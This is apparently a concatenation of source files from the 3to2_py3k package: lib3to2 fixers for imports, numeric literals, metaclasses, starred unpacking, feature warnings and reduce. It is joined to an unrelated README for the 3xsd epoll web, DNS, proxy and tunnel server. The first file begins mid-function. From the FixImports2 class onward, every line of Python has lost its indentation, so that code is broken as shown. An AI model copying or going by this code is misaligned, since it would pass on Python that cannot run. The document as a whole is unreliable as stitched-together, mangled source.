            elif not pre and post:
                # "intern" is first: remove it and the comma that follows.
                for ch in node.children:
                    if type(ch) == pytree.Node:
                        assert ch.children[0].prefix + "intern" \
                            == str(ch.children[0])
                        ch.children[0].remove() # intern
                        assert ch.children[0].prefix + "," \
                            == str(ch.children[0])
                        ch.children[0].remove() # ,
                        return
            elif not post and pre:
                # "intern" is last: remove it and the comma that precedes.
                for ch in node.children:
                    if type(ch) == pytree.Node:
                        assert ch.children[-1].prefix + "intern" \
                            == str(ch.children[-1])
                        ch.children[-1].remove() # intern
                        assert ch.children[-1].prefix + "," \
                            == str(ch.children[-1])
                        ch.children[-1].remove() # ,
                        return
            elif post and pre:
                # "intern" is in the middle: locate it, then drop it and
                # the comma immediately before it.
                for ch in node.children:
                    if type(ch) == pytree.Node:
                        for ch_ in ch.children:
                            if ch_ and ch_.prefix + "intern" == str(ch_):
                                last_ch_ = ch_.prev_sibling
                                ch_.remove() # intern
                                assert last_ch_.prefix + "," \
                                    == str(last_ch_)
                                last_ch_.remove() # ,
                                return
        # Call site: rebuild "sys.intern(obj)..." as "intern(obj)...".
        syms = self.syms
        obj = results["obj"].clone()
        if obj.type == syms.arglist:
            newarglist = obj.clone()
        else:
            newarglist = pytree.Node(syms.arglist, [obj.clone()])
        after = results["after"]
        if after:
            after = [n.clone() for n in after]
        new = pytree.Node(syms.power,
                          [Name("intern")] +
                          [pytree.Node(syms.trailer,
                                       [results["lpar"].clone(),
                                        newarglist,
                                        results["rpar"].clone()] + after)])
        new.prefix = node.prefix
        return new
import re
from lib2to3.pgen2 import token
from lib2to3 import fixer_base
from lib2to3.pygram import python_symbols as syms
from lib2to3.pytree import Node
from lib2to3.fixer_util import Number, Call, Attr, String, Name, ArgList, Comma
# Maps a py3k radix-marker character to its numeric base.
baseMAPPING = {'b':2, 'o':8, 'x':16}
def base(literal):
    """Returns the base of a valid py3k literal."""
    text = literal.strip()
    # Decimal: no leading zero, or the literal is nothing but zeros.
    if not text.startswith("0") or re.match(r"0+$", text):
        return 10
    marker = text[1]
    if marker not in "box":
        # Leading zero with no recognized radix marker.
        return 0
    return baseMAPPING[marker]
class FixNumliterals(fixer_base.BaseFix):
    # We need to modify all numeric literals except floats, complex.

    def unmatch(self, node):
        """Don't match complex numbers, floats, or base-10 ints"""
        # NOTE: hex literals (base 16) are also excluded here, since their
        # spelling is identical in py2k.
        val = node.value
        for bad in "jJ+-.":
            if bad in val: return bad
        base_ = base(val)
        return base_ == 10 or base_ == 16

    def match(self, node):
        """Match number literals that are not excluded by self.unmatch"""
        return (node.type == token.NUMBER) and not self.unmatch(node)

    def transform(self, node, results):
        """
        Call __builtins__.long() with the value and the base of the value.
        This works because 0b10 is int("10", 2), 0o10 is int("10", 8), etc.
        """
        val = node.value
        base_ = base(val)
        if base_ == 8:
            # Octal: rewrite py3k "0o17" as py2k "017" by editing in place.
            assert val.strip().startswith("0o") or \
                val.strip().startswith("0O"), "Invalid format for octal literal"
            node.changed()
            node.value = "".join(("0",val[2:]))
        elif base_ == 2:
            # Binary: py2k has no 0b literals, so build the replacement call
            # __builtins__.long("...", 2) and return it.
            assert val.startswith("0") and val[1] in "bB", \
                "Invalid format for binary literal"
            # __builtins__.long
            func_name = Node(syms.power, Attr(Name("__builtins__"), \
                Name("long")))
            # ("...", 2)
            func_args = [String("".join(("\"", val.strip()[2:], "\""))), \
                Comma(), Number(2, prefix=" ")]
            new_node = Call(func_name, func_args, node.prefix)
            return new_node
from lib2to3 import fixer_base
from lib2to3.fixer_util import Name, String, FromImport, Newline, Comma
from ..fixer_util import token, syms, Leaf, Node, Star, indentation, ImportAsName
# Constants that Tkinter star-exports; the py2k Tk dialog modules
# re-export them as well.
TK_BASE_NAMES = ('ACTIVE', 'ALL', 'ANCHOR', 'ARC','BASELINE', 'BEVEL', 'BOTH',
                 'BOTTOM', 'BROWSE', 'BUTT', 'CASCADE', 'CENTER', 'CHAR',
                 'CHECKBUTTON', 'CHORD', 'COMMAND', 'CURRENT', 'DISABLED',
                 'DOTBOX', 'E', 'END', 'EW', 'EXCEPTION', 'EXTENDED', 'FALSE',
                 'FIRST', 'FLAT', 'GROOVE', 'HIDDEN', 'HORIZONTAL', 'INSERT',
                 'INSIDE', 'LAST', 'LEFT', 'MITER', 'MOVETO', 'MULTIPLE', 'N',
                 'NE', 'NO', 'NONE', 'NORMAL', 'NS', 'NSEW', 'NUMERIC', 'NW',
                 'OFF', 'ON', 'OUTSIDE', 'PAGES', 'PIESLICE', 'PROJECTING',
                 'RADIOBUTTON', 'RAISED', 'READABLE', 'RIDGE', 'RIGHT',
                 'ROUND', 'S', 'SCROLL', 'SE', 'SEL', 'SEL_FIRST', 'SEL_LAST',
                 'SEPARATOR', 'SINGLE', 'SOLID', 'SUNKEN', 'SW', 'StringTypes',
                 'TOP', 'TRUE', 'TclVersion', 'TkVersion', 'UNDERLINE',
                 'UNITS', 'VERTICAL', 'W', 'WORD', 'WRITABLE', 'X', 'Y', 'YES',
                 'wantobjects')

# Maps each py2k module to the public names it provides, so a name imported
# from a merged py3k module can be traced back to the py2k module defining it.
PY2MODULES = {
    'urllib2' : (
        'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler',
        'AbstractHTTPHandler', 'BaseHandler', 'CacheFTPHandler',
        'FTPHandler', 'FileHandler', 'HTTPBasicAuthHandler',
        'HTTPCookieProcessor', 'HTTPDefaultErrorHandler',
        'HTTPDigestAuthHandler', 'HTTPError', 'HTTPErrorProcessor',
        'HTTPHandler', 'HTTPPasswordMgr',
        'HTTPPasswordMgrWithDefaultRealm', 'HTTPRedirectHandler',
        'HTTPSHandler', 'OpenerDirector', 'ProxyBasicAuthHandler',
        'ProxyDigestAuthHandler', 'ProxyHandler', 'Request',
        'StringIO', 'URLError', 'UnknownHandler', 'addinfourl',
        'build_opener', 'install_opener', 'parse_http_list',
        'parse_keqv_list', 'randombytes', 'request_host', 'urlopen'),
    'urllib' : (
        'ContentTooShortError', 'FancyURLopener','URLopener',
        'basejoin', 'ftperrors', 'getproxies',
        'getproxies_environment', 'localhost', 'pathname2url',
        'quote', 'quote_plus', 'splitattr', 'splithost',
        'splitnport', 'splitpasswd', 'splitport', 'splitquery',
        'splittag', 'splittype', 'splituser', 'splitvalue',
        'thishost', 'unquote', 'unquote_plus', 'unwrap',
        'url2pathname', 'urlcleanup', 'urlencode', 'urlopen',
        'urlretrieve',),
    'urlparse' : (
        'parse_qs', 'parse_qsl', 'urldefrag', 'urljoin',
        'urlparse', 'urlsplit', 'urlunparse', 'urlunsplit'),
    'dbm' : (
        'ndbm', 'gnu', 'dumb'),
    'anydbm' : (
        'error', 'open'),
    'whichdb' : (
        'whichdb',),
    'BaseHTTPServer' : (
        'BaseHTTPRequestHandler', 'HTTPServer'),
    'CGIHTTPServer' : (
        'CGIHTTPRequestHandler',),
    'SimpleHTTPServer' : (
        'SimpleHTTPRequestHandler',),
    'FileDialog' : TK_BASE_NAMES + (
        'FileDialog', 'LoadFileDialog', 'SaveFileDialog',
        'dialogstates', 'test'),
    'tkFileDialog' : (
        'Directory', 'Open', 'SaveAs', '_Dialog', 'askdirectory',
        'askopenfile', 'askopenfilename', 'askopenfilenames',
        'askopenfiles', 'asksaveasfile', 'asksaveasfilename'),
    'SimpleDialog' : TK_BASE_NAMES + (
        'SimpleDialog',),
    'tkSimpleDialog' : TK_BASE_NAMES + (
        'askfloat', 'askinteger', 'askstring', 'Dialog'),
    'SimpleXMLRPCServer' : (
        'CGIXMLRPCRequestHandler', 'SimpleXMLRPCDispatcher',
        'SimpleXMLRPCRequestHandler', 'SimpleXMLRPCServer',
        'list_public_methods', 'remove_duplicates',
        'resolve_dotted_attribute'),
    'DocXMLRPCServer' : (
        'DocCGIXMLRPCRequestHandler', 'DocXMLRPCRequestHandler',
        'DocXMLRPCServer', 'ServerHTMLDoc','XMLRPCDocGenerator'),
    }

# Maps each merged py3k module to the tuple of py2k modules it absorbed.
MAPPING = { 'urllib.request' :
                ('urllib2', 'urllib'),
            'urllib.error' :
                ('urllib2', 'urllib'),
            'urllib.parse' :
                ('urllib2', 'urllib', 'urlparse'),
            'dbm.__init__' :
                ('anydbm', 'whichdb'),
            'http.server' :
                ('CGIHTTPServer', 'SimpleHTTPServer', 'BaseHTTPServer'),
            'tkinter.filedialog' :
                ('tkFileDialog', 'FileDialog'),
            'tkinter.simpledialog' :
                ('tkSimpleDialog', 'SimpleDialog'),
            'xmlrpc.server' :
                ('DocXMLRPCServer', 'SimpleXMLRPCServer'),
            }

# helps match 'http', as in 'from http.server import ...'
simple_name = "name='{name}'"
# helps match 'server', as in 'from http.server import ...'
simple_attr = "attr='{attr}'"
# helps match 'HTTPServer', as in 'from http.server import HTTPServer'
simple_using = "using='{using}'"
# helps match 'urllib.request', as in 'import urllib.request'
dotted_name = "dotted_name=dotted_name< {fmt_name} '.' {fmt_attr} >"
# helps match 'http.server', as in 'http.server.HTTPServer(...)'
power_twoname = "pow=power< {fmt_name} trailer< '.' {fmt_attr} > trailer< '.' using=any > any* >"
# helps match 'dbm.whichdb', as in 'dbm.whichdb(...)'
power_onename = "pow=power< {fmt_name} trailer< '.' using=any > any* >"
# helps match 'from http.server import HTTPServer'
# also helps match 'from http.server import HTTPServer, SimpleHTTPRequestHandler'
# also helps match 'from http.server import *'
from_import = "from_import=import_from< 'from' {modules} 'import' (import_as_name< using=any 'as' renamed=any> | in_list=import_as_names< using=any* > | using='*' | using=NAME) >"
# helps match 'import urllib.request'
name_import = "name_import=import_name< 'import' ({fmt_name} | in_list=dotted_as_names< imp_list=any* >) >"

#############
# WON'T FIX #
#############

# helps match 'import urllib.request as name'
name_import_rename = "name_import_rename=dotted_as_name< {fmt_name} 'as' renamed=any >"
# helps match 'from http import server'
from_import_rename = "from_import_rename=import_from< 'from' {fmt_name} 'import' ({fmt_attr} | import_as_name< {fmt_attr} 'as' renamed=any > | in_list=import_as_names< any* ({fmt_attr} | import_as_name< {fmt_attr} 'as' renamed=any >) any* >) >"
def all_modules_subpattern():
    """
    Builds a pattern alternation covering every toplevel name
    (urllib, http, etc) known to MAPPING.
    """
    split_mods = [mod.split(".") for mod in MAPPING]
    dotted_alts = [dotted_name.format(fmt_name=simple_name.format(name=parts[0]),
                                      fmt_attr=simple_attr.format(attr=parts[1]))
                   for parts in split_mods]
    # Packages whose __init__ was merged also match as a bare name.
    bare_alts = [simple_name.format(name=parts[0])
                 for parts in split_mods if parts[1] == "__init__"]
    return "( " + " | ".join(dotted_alts) + " | " + " | ".join(bare_alts) + " )"
def all_candidates(name, attr, MAPPING=MAPPING):
    """
    Returns all candidate packages for the name.attr
    """
    dotted = name + '.' + attr
    assert dotted in MAPPING, "No matching package found."
    candidates = MAPPING[dotted]
    if attr != '__init__':
        return candidates
    # The package itself is also a candidate for its own __init__ module.
    return candidates + (name,)
def new_package(name, attr, using, MAPPING=MAPPING, PY2MODULES=PY2MODULES):
    """
    Returns which candidate py2k package for name.attr provides the
    name ``using``, or None when no candidate does.
    """
    for candidate in all_candidates(name, attr, MAPPING):
        if using in PY2MODULES[candidate]:
            return candidate
    return None
def build_import_pattern(mapping1, mapping2):
    """
    mapping1: A dict mapping py3k modules to all possible py2k replacements
    mapping2: A dict mapping py2k modules to the things they do
    This builds a HUGE pattern to match all ways that things can be imported
    """
    # One catch-all from-import alternative covering every known module,
    # e.g. py3k urllib.request vs py2k ('urllib2', 'urllib').
    yield from_import.format(modules=all_modules_subpattern())
    for py3k_mod in mapping1:
        name, attr = py3k_mod.split('.')
        s_name = simple_name.format(name=name)
        s_attr = simple_attr.format(attr=attr)
        d_name = dotted_name.format(fmt_name=s_name, fmt_attr=s_attr)
        yield name_import.format(fmt_name=d_name)
        yield power_twoname.format(fmt_name=s_name, fmt_attr=s_attr)
        if attr == '__init__':
            # Packages with merged __init__ also match as a bare name.
            yield name_import.format(fmt_name=s_name)
            yield power_onename.format(fmt_name=s_name)
        yield name_import_rename.format(fmt_name=d_name)
        yield from_import_rename.format(fmt_name=s_name, fmt_attr=s_attr)
def name_import_replacement(name, attr):
    """
    Build an ``import mod1, mod2, ...`` statement node naming every
    py2k candidate module for the py3k module name.attr.
    """
    pieces = [Name("import")]
    first = True
    for candidate in all_candidates(name.value, attr.value):
        if not first:
            pieces.append(Comma())
        pieces.append(Name(candidate, prefix=" "))
        first = False
    return Node(syms.import_name, pieces)
class FixImports2(fixer_base.BaseFix):
run_order = 4
PATTERN = " | \n".join(build_import_pattern(MAPPING, PY2MODULES))
def transform(self, node, results):
# The patterns dictate which of these names will be defined
name = results.get("name")
attr = results.get("attr")
if attr is None:
attr = Name("__init__")
using = results.get("using")
in_list = results.get("in_list")
imp_list = results.get("imp_list")
power = results.get("pow")
before = results.get("before")
after = results.get("after")
d_name = results.get("dotted_name")
# An import_stmt is always contained within a simple_stmt
simple_stmt = node.parent
# The parent is useful for adding new import_stmts
parent = simple_stmt.parent
idx = parent.children.index(simple_stmt)
if any((results.get("from_import_rename") is not None,
results.get("name_import_rename") is not None)):
self.cannot_convert(node, reason="ambiguity: import binds a single name")
elif using is None and not in_list:
# import urllib.request, single-name import
replacement = name_import_replacement(name, attr)
replacement.prefix = node.prefix
node.replace(replacement)
elif using is None:
# import ..., urllib.request, math, http.sever, ...
for d_name in imp_list:
if d_name.type == syms.dotted_name:
name = d_name.children[0]
attr = d_name.children[2]
elif d_name.type == token.NAME and d_name.value + ".__init__" in MAPPING:
name = d_name
attr = Name("__init__")
else:
continue
if name.value + "." + attr.value not in MAPPING:
continue
candidates = all_candidates(name.value, attr.value)
children = [Name("import")]
for c in candidates:
children.append(Name(c, prefix=" "))
children.append(Comma())
children.pop()
# Put in the new statement.
indent = indentation(simple_stmt)
next_stmt = Node(syms.simple_stmt, [Node(syms.import_name, children), Newline()])
parent.insert_child(idx+1, next_stmt)
parent.insert_child(idx+1, Leaf(token.INDENT, indent))
# Remove the old imported name
test_comma = d_name.next_sibling
if test_comma and test_comma.type == token.COMMA:
test_comma.remove()
elif test_comma is None:
test_comma = d_name.prev_sibling
if test_comma and test_comma.type == token.COMMA:
test_comma.remove()
d_name.remove()
if not in_list.children:
simple_stmt.remove()
elif in_list is not None:
##########################################################
# "from urllib.request import urlopen, urlretrieve, ..." #
# Replace one import statement with potentially many. #
##########################################################
packages = dict([(n,[]) for n in all_candidates(name.value,
attr.value)])
# Figure out what names need to be imported from what
# Add them to a dict to be parsed once we're completely done
for imported in using:
if imported.type == token.COMMA:
continue
if imported.type == syms.import_as_name:
test_name = imported.children[0].value
if len(imported.children) > 2:
# 'as' whatever
rename = imported.children[2].value
else:
rename = None
elif imported.type == token.NAME:
test_name = imported.value
rename = None
pkg = new_package(name.value, attr.value, test_name)
packages[pkg].append((test_name, rename))
# Parse the dict to create new import statements to replace this one
imports = []
for new_pkg, names in packages.items():
if not names:
# Didn't import anything from that package, move along
continue
new_names = []
for test_name, rename in names:
if rename is None:
new_names.append(Name(test_name, prefix=" "))
else:
new_names.append(ImportAsName(test_name, rename, prefix=" "))
new_names.append(Comma())
new_names.pop()
imports.append(FromImport(new_pkg, new_names))
# Replace this import statement with one of the others
replacement = imports.pop()
replacement.prefix = node.prefix
node.replace(replacement)
indent = indentation(simple_stmt)
# Add the remainder of the imports as new statements.
while imports:
next_stmt = Node(syms.simple_stmt, [imports.pop(), Newline()])
parent.insert_child(idx+1, next_stmt)
parent.insert_child(idx+1, Leaf(token.INDENT, indent))
elif using.type == token.STAR:
# from urllib.request import *
nodes = [FromImport(pkg, [Star(prefix=" ")]) for pkg in
all_candidates(name.value, attr.value)]
replacement = nodes.pop()
replacement.prefix = node.prefix
node.replace(replacement)
indent = indentation(simple_stmt)
while nodes:
next_stmt = Node(syms.simple_stmt, [nodes.pop(), Newline()])
parent.insert_child(idx+1, next_stmt)
parent.insert_child(idx+1, Leaf(token.INDENT, indent))
elif power is not None:
# urllib.request.urlopen
# Replace it with urllib2.urlopen
pkg = new_package(name.value, attr.value, using.value)
# Remove the trailer node that contains attr.
if pkg:
if attr.parent:
attr.parent.remove()
name.replace(Name(pkg, prefix=name.prefix))
elif using.type == token.NAME:
# from urllib.request import urlopen
pkg = new_package(name.value, attr.value, using.value)
if attr.value == "__init__" and pkg == name.value:
# Replacing "from abc import xyz" with "from abc import xyz"
# Just leave it alone so as not to mess with other fixers
return
else:
node.replace(FromImport(pkg, [using])) | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/lib3to2/fixes/fix_imports2.py | fix_imports2.py |
from lib2to3 import fixer_base
from ..fixer_util import Name, syms, Node, Leaf, Newline, find_root, indentation, suitify
from lib2to3.pygram import token
def has_metaclass(parent):
results = None
for node in parent.children:
kids = node.children
if node.type == syms.argument:
if kids[0] == Leaf(token.NAME, "metaclass") and \
kids[1] == Leaf(token.EQUAL, "=") and \
kids[2]:
#Hack to avoid "class X(=):" with this case.
results = [node] + kids
break
elif node.type == syms.arglist:
# Argument list... loop through it looking for:
# Node(*, [*, Leaf(token.NAME, u"metaclass"), Leaf(token.EQUAL, u"="), Leaf(*, *)]
for child in node.children:
if results: break
if child.type == token.COMMA:
#Store the last comma, which precedes the metaclass
comma = child
elif type(child) == Node:
meta = equal = name = None
for arg in child.children:
if arg == Leaf(token.NAME, "metaclass"):
#We have the (metaclass) part
meta = arg
elif meta and arg == Leaf(token.EQUAL, "="):
#We have the (metaclass=) part
equal = arg
elif meta and equal:
#Here we go, we have (metaclass=X)
name = arg
results = (comma, meta, equal, name)
break
return results
class FixMetaclass(fixer_base.BaseFix):
PATTERN = """
classdef<any*>
"""
def transform(self, node, results):
meta_results = has_metaclass(node)
if not meta_results: return
for meta in meta_results:
meta.remove()
target = Leaf(token.NAME, "__metaclass__")
equal = Leaf(token.EQUAL, "=", prefix=" ")
# meta is the last item in what was returned by has_metaclass(): name
name = meta
name.prefix = " "
stmt_node = Node(syms.atom, [target, equal, name])
suitify(node)
for item in node.children:
if item.type == syms.suite:
for stmt in item.children:
if stmt.type == token.INDENT:
# Insert, in reverse order, the statement, a newline,
# and an indent right after the first indented line
loc = item.children.index(stmt) + 1
# Keep consistent indentation form
ident = Leaf(token.INDENT, stmt.value)
item.insert_child(loc, ident)
item.insert_child(loc, Newline())
item.insert_child(loc, stmt_node)
break | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/lib3to2/fixes/fix_metaclass.py | fix_metaclass.py |
from lib2to3 import fixer_base
from itertools import count
from ..fixer_util import Assign, Comma, Call, Newline, Name, Number, indentation, suitify, commatize, token, syms, Node, Leaf
def assignment_source(num_pre, num_post, LISTNAME, ITERNAME):
"""
Accepts num_pre and num_post, which are counts of values
before and after the starg (not including the starg)
Returns a source fit for Assign() from fixer_util
"""
children = []
pre = str(num_pre)
post = str(num_post)
# This code builds the assignment source from lib2to3 tree primitives.
# It's not very readable, but it seems like the most correct way to do it.
if num_pre > 0:
pre_part = Node(syms.power, [Name(LISTNAME), Node(syms.trailer, [Leaf(token.LSQB, "["), Node(syms.subscript, [Leaf(token.COLON, ":"), Number(pre)]), Leaf(token.RSQB, "]")])])
children.append(pre_part)
children.append(Leaf(token.PLUS, "+", prefix=" "))
main_part = Node(syms.power, [Leaf(token.LSQB, "[", prefix=" "), Name(LISTNAME), Node(syms.trailer, [Leaf(token.LSQB, "["), Node(syms.subscript, [Number(pre) if num_pre > 0 else Leaf(1, ""), Leaf(token.COLON, ":"), Node(syms.factor, [Leaf(token.MINUS, "-"), Number(post)]) if num_post > 0 else Leaf(1, "")]), Leaf(token.RSQB, "]"), Leaf(token.RSQB, "]")])])
children.append(main_part)
if num_post > 0:
children.append(Leaf(token.PLUS, "+", prefix=" "))
post_part = Node(syms.power, [Name(LISTNAME, prefix=" "), Node(syms.trailer, [Leaf(token.LSQB, "["), Node(syms.subscript, [Node(syms.factor, [Leaf(token.MINUS, "-"), Number(post)]), Leaf(token.COLON, ":")]), Leaf(token.RSQB, "]")])])
children.append(post_part)
source = Node(syms.arith_expr, children)
return source
class FixUnpacking(fixer_base.BaseFix):
PATTERN = """
expl=expr_stmt< testlist_star_expr<
pre=(any ',')*
star_expr< '*' name=NAME >
post=(',' any)* [','] > '=' source=any > |
impl=for_stmt< 'for' lst=exprlist<
pre=(any ',')*
star_expr< '*' name=NAME >
post=(',' any)* [','] > 'in' it=any ':' suite=any>"""
def fix_explicit_context(self, node, results):
pre, name, post, source = (results.get(n) for n in ("pre", "name", "post", "source"))
pre = [n.clone() for n in pre if n.type == token.NAME]
name.prefix = " "
post = [n.clone() for n in post if n.type == token.NAME]
target = [n.clone() for n in commatize(pre + [name.clone()] + post)]
# to make the special-case fix for "*z, = ..." correct with the least
# amount of modification, make the left-side into a guaranteed tuple
target.append(Comma())
source.prefix = ""
setup_line = Assign(Name(self.LISTNAME), Call(Name("list"), [source.clone()]))
power_line = Assign(target, assignment_source(len(pre), len(post), self.LISTNAME, self.ITERNAME))
return setup_line, power_line
def fix_implicit_context(self, node, results):
"""
Only example of the implicit context is
a for loop, so only fix that.
"""
pre, name, post, it = (results.get(n) for n in ("pre", "name", "post", "it"))
pre = [n.clone() for n in pre if n.type == token.NAME]
name.prefix = " "
post = [n.clone() for n in post if n.type == token.NAME]
target = [n.clone() for n in commatize(pre + [name.clone()] + post)]
# to make the special-case fix for "*z, = ..." correct with the least
# amount of modification, make the left-side into a guaranteed tuple
target.append(Comma())
source = it.clone()
source.prefix = ""
setup_line = Assign(Name(self.LISTNAME), Call(Name("list"), [Name(self.ITERNAME)]))
power_line = Assign(target, assignment_source(len(pre), len(post), self.LISTNAME, self.ITERNAME))
return setup_line, power_line
def transform(self, node, results):
"""
a,b,c,d,e,f,*g,h,i = range(100) changes to
_3to2list = list(range(100))
a,b,c,d,e,f,g,h,i, = _3to2list[:6] + [_3to2list[6:-2]] + _3to2list[-2:]
and
for a,b,*c,d,e in iter_of_iters: do_stuff changes to
for _3to2iter in iter_of_iters:
_3to2list = list(_3to2iter)
a,b,c,d,e, = _3to2list[:2] + [_3to2list[2:-2]] + _3to2list[-2:]
do_stuff
"""
self.LISTNAME = self.new_name("_3to2list")
self.ITERNAME = self.new_name("_3to2iter")
expl, impl = results.get("expl"), results.get("impl")
if expl is not None:
setup_line, power_line = self.fix_explicit_context(node, results)
setup_line.prefix = expl.prefix
power_line.prefix = indentation(expl.parent)
setup_line.append_child(Newline())
parent = node.parent
i = node.remove()
parent.insert_child(i, power_line)
parent.insert_child(i, setup_line)
elif impl is not None:
setup_line, power_line = self.fix_implicit_context(node, results)
suitify(node)
suite = [k for k in node.children if k.type == syms.suite][0]
setup_line.prefix = ""
power_line.prefix = suite.children[1].value
suite.children[2].prefix = indentation(suite.children[2])
suite.insert_child(2, Newline())
suite.insert_child(2, power_line)
suite.insert_child(2, Newline())
suite.insert_child(2, setup_line)
results.get("lst").replace(Name(self.ITERNAME, prefix=" ")) | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/lib3to2/fixes/fix_unpacking.py | fix_unpacking.py |
from .feature_base import Feature, Features
from lib2to3 import fixer_base
FEATURES = [
#(FeatureName,
# FeaturePattern,
# FeatureMinVersion,
#),
("memoryview",
"power < 'memoryview' trailer < '(' any* ')' > any* >",
"2.7",
),
("numbers",
"""import_from< 'from' 'numbers' 'import' any* > |
import_name< 'import' ('numbers' dotted_as_names< any* 'numbers' any* >) >""",
"2.6",
),
("abc",
"""import_name< 'import' ('abc' dotted_as_names< any* 'abc' any* >) > |
import_from< 'from' 'abc' 'import' any* >""",
"2.6",
),
("io",
"""import_name< 'import' ('io' dotted_as_names< any* 'io' any* >) > |
import_from< 'from' 'io' 'import' any* >""",
"2.6",
),
("bin",
"power< 'bin' trailer< '(' any* ')' > any* >",
"2.6",
),
("formatting",
"power< any trailer< '.' 'format' > trailer< '(' any* ')' > >",
"2.6",
),
("nonlocal",
"global_stmt< 'nonlocal' any* >",
"3.0",
),
("with_traceback",
"trailer< '.' 'with_traceback' >",
"3.0",
),
]
class FixFeatures(fixer_base.BaseFix):
run_order = 9 # Wait until all other fixers have run to check for these
# To avoid spamming, we only want to warn for each feature once.
features_warned = set()
# Build features from the list above
features = Features([Feature(name, pattern, version) for \
name, pattern, version in FEATURES])
PATTERN = features.PATTERN
def match(self, node):
to_ret = super(FixFeatures, self).match(node)
# We want the mapping only to tell us the node's specific information.
try:
del to_ret['node']
except Exception:
# We want it to delete the 'node' from the results
# if it's there, so we don't care if it fails for normal reasons.
pass
return to_ret
def transform(self, node, results):
for feature_name in results:
if feature_name in self.features_warned:
continue
else:
curr_feature = self.features[feature_name]
if curr_feature.version >= "3":
fail = self.cannot_convert
else:
fail = self.warning
fail(node, reason=curr_feature.message_text())
self.features_warned.add(feature_name) | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/lib3to2/fixes/fix_features.py | fix_features.py |
from lib2to3 import fixer_base
from lib2to3.fixer_util import Call
from lib2to3.pytree import Node, Leaf
from lib2to3.pgen2 import token
class FixReduce(fixer_base.BaseFix):
PATTERN = """
power< 'functools' trailer< '.' 'reduce' >
args=trailer< '(' arglist< any* > ')' > > |
imported=import_from< 'from' 'functools' 'import' 'reduce' > |
import_from< 'from' 'functools' 'import' import_as_names< any* in_list='reduce' any* > >
"""
def transform(self, node, results):
syms = self.syms
args, imported = (results.get("args"), results.get("imported"))
in_list = results.get("in_list")
if imported:
next = imported.next_sibling
prev = imported.prev_sibling
parent = imported.parent
if next and next.type == token.SEMI:
next.remove()
next = imported.next_sibling
imported.remove()
if next is not None and next.type == token.NEWLINE:
# nothing after from_import on the line
if prev is not None:
if prev.type == token.SEMI:
prev.remove()
elif parent.next_sibling is not None:
# nothing before from_import either
parent.next_sibling.prefix = imported.prefix
parent.remove()
elif args:
args = args.clone()
prefix = node.prefix
return Node(syms.power, [Leaf(token.NAME, "reduce"), args],
prefix=prefix)
elif in_list:
next = in_list.next_sibling
if next is not None:
if next.type == token.COMMA:
next.remove()
else:
prev = in_list.prev_sibling
if prev is not None:
if prev.type == token.COMMA:
prev.remove()
in_list.remove() | 3to2_py3k | /3to2_py3k-1.0.tar.gz/3to2_py3k-1.0/lib3to2/fixes/fix_reduce.py | fix_reduce.py |
##3xsd
3xsd is a native epoll server serving TCP/UDP connections, a high performance static web server, a
failover dns server, a http-based distributed file server, a load-balance proxy-cache server, and
a 'warp drive' server. Written in python, take the full power of multi-cores.
##Features in detail:
###3wsd - web server
supporting: static files, event driven(epoll), using mmap & sendfile to send files,
in-mem xcache, transparent gzip content transfer with fixed length(small file) &
chunked(large file), persistent storage of gzip files,
partial support of WebDAV(PUT/DELETE), pipelining support
###3nsd - dns server
supporting: only A record resolution, domainname failover(refer to conf file),
ip icmp probe & hide when fail, round robbin ip resolving
global DNS Left-Right Range Resolve(LRRR)(experimental)
###3zsd - proxy server
supporting: load balance backend servers, in-mem file caching &
persistent cache file storage
###3fsd - distribute web file system
supporting: mass unlimitted file storage, easy to expand,
O(1) location algorithm, non-centralized, can work with standard web server(WebDAV)
in proxy mode, file redundancy, file persistent caching
###3wdd - 'warp drive' server
supporting: data tunneling over UDT and tun,
better congestion control than TCP/UDP over wan link,
better thoughput(above 80%) over wan link, refer to this report:
http://www.c-s-a.org.cn/ch/reader/create_pdf.aspx?file_no=20091035
tunnel ip/mtu/txqueuelen/route define, auto create/recreate/destroy
encrypt packages through AES-128-ECB/CBC/CFB/CTR and Blowfish-CBC/CFB/CTR
tunnel on-the-fly compress with zlib/lzo, tunnel data relaying
route metric, routing data through different path, depending on tunnel rtt(choose the best one)
More to find in .conf file.
##Performance:
###3wsd:
Small file under 1KB single process test(full in-mem), contrast with nginx configuring
accept_mutex off, 80% performance.
Multi processes test, with reuse_port enabling kernel, 95% performance of nginx(and beyond,
may be 105% or more, based on process number, I tested 2-4).
The tests above is not quite strict, but I just want to say that it's fast enough.
And with pipelining enabled, 3wsd will perform better with 3-4 requests/send(5%-10%
performance increase), 2 requests/send have the same speed with non-piplining.
###3zsd:
About 80% performance of 3wsd.
###3nsd:
Fast enough...about 2800-3000 queries/s per processes, with 1GHz bcm2709 4-cores ARMv7
cpu testing, better when multi-processes with reuse_port enabling kernel.
###3fsd:
Same with 3zsd.
###3wdd:
Early testing indicated that:
UDT tunnel(no encrypt) performing 50%-60% speed of direct TCP connection with ZetaTCP,
and package lost rate remaining below 0.6%, while direct connection has 1.4%-3%.
(Test CN-US WAN link with 150ms-280ms latency, through the always-jammed CUCN submarine cable)
However, UDT tunnel beats normal TCP connection without ZetaTCP, with 50% - 4 times
(commonly 1-2 times) outperforming.(v)(Test link like above)
Update:
And an encrypted UDT tunnel with AES-CBC/CFB will has 50% performance decrease (because the
method itself processes doubled size of data, and extra iv/padding data transfer).
Now with a Blowfish-CTR method, tunnel data transfer performance is closed to raw non-encrypt
tunnel. I believe that with a intel AES-NI supported CPU(like XEON E3-1240/1270), AES-128-CTR
can also do it.
###More performance:
There are at lease two ways to increase the performance of 3xsd:
1.Install Cython, and rename _3xsd.py to _3xsd.pyx, run it.
Cython will compile _3xsd.py lib into a _3xsd.so file, using static type
declarations. This can gain about 5%-6% performance increasement.
2.Use PyPy.This can gain about 10%-15% performance increasement(or more).
#OS requirement & install:
CentOS 6/7 with python 2.6/2.7, Debian 6/7. Python 2.7 recommended.
Doing this before running the program(minimal requirement):
yum install python-gevent pysendfile python-setproctitle python-psutil python-pip
(python-pip is optional if install dpkt)
Dpkt module is also needed when running 3nsd DNS server, pip install it.
If you want to use 3wdd, python-pytun, pyudt4, pycrypto, python-lzo are also needed.
yum install python-crypto2.6 python-lzo (for centos6)
yum install python2-crypto (for centos7)
will quickly install pycrypto(probably do some 'linking' works) and lzo. The other two depended on pip install.
